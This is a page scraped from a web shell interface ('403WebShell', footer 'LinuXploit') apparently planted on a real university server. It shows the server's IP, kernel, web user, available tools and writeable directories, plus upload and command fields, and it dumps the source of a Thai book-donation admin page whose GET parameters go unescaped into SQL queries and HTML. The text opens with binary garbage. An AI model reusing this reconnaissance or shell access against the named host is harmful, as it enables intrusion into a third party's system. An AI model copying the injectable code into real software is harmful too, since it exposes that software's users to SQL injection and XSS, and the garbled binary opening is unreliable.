h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/donatebook/pages/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/arit/donatebook/pages/admin/donate_detail.php
<?php include 'check_mode_admin.php';?>
<?php include '../dbconnect.php';?>
<?php include 'header.php';?>

<?php
	$pagetitle_text = "ข้อมูลอภินันทนาการ";
?>		  
	<h1 class="page-header"><?php echo $pagetitle_text;?></h1>	
<?php	
	$donate_detail_id=$_GET['donate_detail_id'];
	$strKeyword=$_GET['txtKeyword'];
	$page=$_GET['Page'];
	$donate_list=$_GET['donate_list'];		
	$sql = "SELECT * from donate_detail WHERE donate_detail_id=" . $donate_detail_id;
	$query = mysqli_query($conn,$sql);	
	if($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
	{
?>
		<table class="table table-striped table-bordered table-hover">
			<tbody>
				<tr>
					<td>รหัส</td>
					<td><?php echo $result["donate_detail_id"];?></td>
				</tr>
				<tr>
					<td>เลขที่เอกสาร</td>
					<td><?php echo $result["donate_number"];?></td>
				</tr>
				<tr>
					<td>วันที่มอบ</td>
					<td><?php echo $result["send_date"];?></td>
				</tr>	
				<tr>
					<td>ชื่อผู้มอบ</td>
					<td><?php echo $result["send_name"];?></td>
				</tr>	
				<tr>
					<td>หน่วยงาน</td>
					<td><?php echo $result["organization"];?></td>
				</tr>
			</tbody>
		</table>
<?php
	$donate_detail_edit_url = "donate_detail_edit.php?donate_detail_id=" . $donate_detail_id;
	if ($strKeyword<>"")
	{
		$donate_detail_edit_url .= "&txtKeyword=" . $strKeyword;
	}
	if ($page<>"")
	{
		$donate_detail_edit_url .= "&Page=" . $page;
	}
	if ($donate_list<>"")
	{
		$donate_detail_edit_url .= "&donate_list=" . $donate_list;
	}		
	$donate_detail_delete_url = "donate_detail_delete.php?donate_detail_id=" . $donate_detail_id;
	if ($strKeyword<>"")
	{
		$donate_detail_delete_url .= "&txtKeyword=" . $strKeyword;
	}
	if ($page<>"")
	{
		$donate_detail_delete_url .= "&Page=" . $page;
	}	
	if ($donate_list<>"")
	{
		$donate_detail_delete_url .= "&donate_list=" . $donate_list;
	}
?>		
<a href="<?php echo $donate_detail_edit_url;?>"><button type="button" class="btn btn-success">แก้ไขข้อมูลนี้</button></a>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="<?php echo $donate_detail_delete_url;?>"><button type="button" class="btn btn-danger">ลบข้อมูลนี้</button></a>
<!--&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href='javascript:history.back(1);'><button type="button" class="btn btn-warning">กลับหน้าที่แล้ว</button></a>-->
<?php 
	//$index_url = "index.php";
	if ($donate_list<>"")
	{
		$index_url = "donate_list.php";
	}
	else
	{
		$index_url = "index.php";
	}
	if ($strKeyword<>"")
	{
		$index_url .= "?txtKeyword=" . $strKeyword;
		if ($page<>"")
		{
			$index_url .= "&Page=" . $page;
		}
	}
	else
	{
		if ($page<>"")
		{
			$index_url .= "?Page=" . $page;
		}	
	}

?>		
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="<?php echo $index_url;?>"><button type="button" class="btn btn-warning">กลับหน้าที่แล้ว</button></a>

<h2 class="page-header">รายชื่อหนังสืออภินันทนาการ&nbsp;&nbsp;&nbsp;&nbsp;<a href="#dbook_add"><button type="button" class="btn btn-primary">เพิ่มหนังสือ</button></a></h2>
<?php
	$sql = "SELECT dbook.dbook_id, dbook.title, dbook.author, dbook.amount, dbook.file_amount, dbook_type.dbook_type_name, dbook_status.dbook_status_name,dbook.dbook_status_id, dbook.note";
	$sql .= " FROM (dbook INNER JOIN dbook_status ON dbook.dbook_status_id = dbook_status.dbook_status_id) INNER JOIN dbook_type ON dbook.dbook_type_id = dbook_type.dbook_type_id";
	$sql .= " WHERE dbook.donate_detail_id=" . $donate_detail_id;
	$sql .= " ORDER BY dbook.dbook_id DESC";
		
	$query = mysqli_query($conn,$sql);
?>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
										<th><div align="center">id</div></th>
										<th><div align="center">ชื่อเรื่อง</div></th>
										<th><div align="center">ผู้แต่ง</div></th>
										<th><div align="center">จำนวนเล่ม</div></th>
										<th><div align="center">จำนวนแผ่น</div></th>
										<th><div align="center">ประเภท</div></th>
										<th><div align="center">สถานะ</div></th>
										<th><div align="center">หมายเหตุ</div></th>
										<th><div align="center">&nbsp;</div></th>
                                        </tr>
                                    </thead>
                                <tbody>
<?php
while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
{
	$dbook_edit_url = "dbook_edit.php?dbook_id=" . $result["dbook_id"];
	$dbook_edit_url .= "&donate_detail_id=" . $donate_detail_id;
	if ($strKeyword<>"")
	{
		$dbook_edit_url .= "&txtKeyword=" . $strKeyword;
	}
	if ($page<>"")
	{
		$dbook_edit_url .= "&Page=" . $page;
	}
	if ($donate_list<>"")
	{
		$dbook_edit_url .= "&donate_list=" . $donate_list;
	}		
	$dbook_delete_url = "dbook_delete.php?dbook_id=" . $result["dbook_id"];
	$dbook_delete_url .= "&donate_detail_id=" . $donate_detail_id;
	if ($strKeyword<>"")
	{
		$dbook_delete_url .= "&txtKeyword=" . $strKeyword;
	}
	if ($page<>"")
	{
		$dbook_delete_url .= "&Page=" . $page;
	}	
	if ($donate_list<>"")
	{
		$dbook_delete_url .= "&donate_list=" . $donate_list;
	}
?>
                                    <tr>
                                        <td><?php echo $result["dbook_id"];?></td>
										<td><a href="<?php echo $dbook_edit_url;?>"><?php echo $result["title"];?></a></td>	
										<td><?php echo $result["author"];?></td>
										<td><?php echo $result["amount"];?></td>
										<td><?php echo $result["file_amount"];?></td>
										<td><?php echo $result["dbook_type_name"];?></td>
<?php
if ($result["dbook_status_id"] == 1)
{
	$status_color="#FF3300";
}
else if ($result["dbook_status_id"] == 2)
{
	$status_color="yellow";
}
else if ($result["dbook_status_id"] == 4)
{
	$status_color="lightblue";
}
else if ($result["dbook_status_id"] == 5)
{
	$status_color="#EEB0F1";
}
else if ($result["dbook_status_id"] == 6)
{
	$status_color="#AA7C80";
}
else
{
	$status_color="#66FF33";
}
?>										
										<td bgcolor="<?php echo $status_color; ?>"><?php echo $result["dbook_status_name"];?></td>
										<td><?php echo $result["note"];?></td>
										<td><a href="<?php echo $dbook_edit_url;?>"><i class="glyphicon glyphicon-edit"></i>แก้ไข</a>&nbsp;&nbsp;<a href="<?php echo $dbook_delete_url;?>"><i class="glyphicon glyphicon-remove"></i>ลบ</a></td>
                                    </tr>
<?php
}
?>									
                                </tbody>
                            </table>
                            <!-- /.table-responsive -->

<BR /><BR />
	<form action="dbook_add_db.php" method="post" name="form1" id="form1">
		<table class="table table-striped table-bordered table-hover">
			<thead>
				<tr>
					<th colspan="2"><a name="dbook_add" id="dbook_add"></a>เพิ่มหนังสืออภินันทนาการ</th>
				</tr>
			</thead>

			<tbody>
				<tr>
					<td>ประเภท</td>
					<td>
						<div class="form-group">
							<select name="dbook_type_id" id="dbook_type_id" class="form-control">
<?php
		$sql2 = "SELECT * from dbook_type ORDER BY dbook_type_id";
		$query2 = mysqli_query($conn,$sql2);	
		while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
?>
								<option value="<?php echo $result2["dbook_type_id"];?>"><?php echo $result2["dbook_type_name"];?></option>
<?php			
		}
?>								
							</select>
						</div>					
					</td>
				</tr>				
				<tr>
					<td>ชื่อเรื่อง</td>
					<td>
						<div class="form-group">
							<input name="title" id="title" class="form-control">
						</div>
					</td>
				</tr>
				<tr>
					<td>ผู้แต่ง</td>
					<td>
						<div class="form-group">
							<input name="author" id="author" class="form-control">
						</div>
					</td>
				</tr>	
				<tr>
					<td>จำนวนเล่ม</td>
					<td>
						<div class="form-group">
							<input name="amount" id="amount" class="form-control">
						</div>					
					</td>
				</tr>	
				<tr>
					<td>จำนวนไฟล์/แผ่น</td>
					<td>
						<div class="form-group">
							<input name="file_amount" id="file_amount" class="form-control">
						</div>						
					</td>
				</tr>
				<tr>
					<td>สถานะ</td>
					<td>
						<div class="form-group">
							<select name="dbook_status_id" id="dbook_status_id" class="form-control">
<?php
		$sql2 = "SELECT * from dbook_status ORDER BY dbook_order";
		$query2 = mysqli_query($conn,$sql2);	
		while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
		{
?>
								<option value="<?php echo $result2["dbook_status_id"];?>"><?php echo $result2["dbook_status_name"];?></option>
<?php			
		}
?>								
							</select>
						</div>						
					</td>
				</tr>
				<tr>
					<td>หมายเหตุ</td>
					<td>
						<div class="form-group">
							<input name="note" id="note" class="form-control">
						</div>						
					</td>
				</tr>																							
			</tbody>
		</table>
                                        <div class="form-group">
											<input name="submit" type="submit" id="submit" value="บันทึกข้อมูล" class="btn btn-success">
											&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
											<input name="reset" type="reset" id="reset" value="ล้าง" class="btn btn-default">
											<input name="donate_detail_id" type="hidden" id="donate_detail_id" value="<?php echo $donate_detail_id;?>" />
											<input name="txtKeyword" type="hidden" id="txtKeyword" value="<?php echo $strKeyword;?>" />
											<input name="Page" type="hidden" id="Page" value="<?php echo $page;?>" />
											<input name="donate_list" type="hidden" id="donate_list" value="<?php echo $donate_list;?>" />
                                        </div>	
	</form>									
<BR /><BR>
																			
<?php	
	}
	else
	{
		echo "ไม่พบข้อมูล";
?>		
		<BR /><BR />
		<a href='javascript:history.back(1);'><button type="button" class="btn btn-warning">กลับหน้าที่แล้ว</button>
<?php
	}
?>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit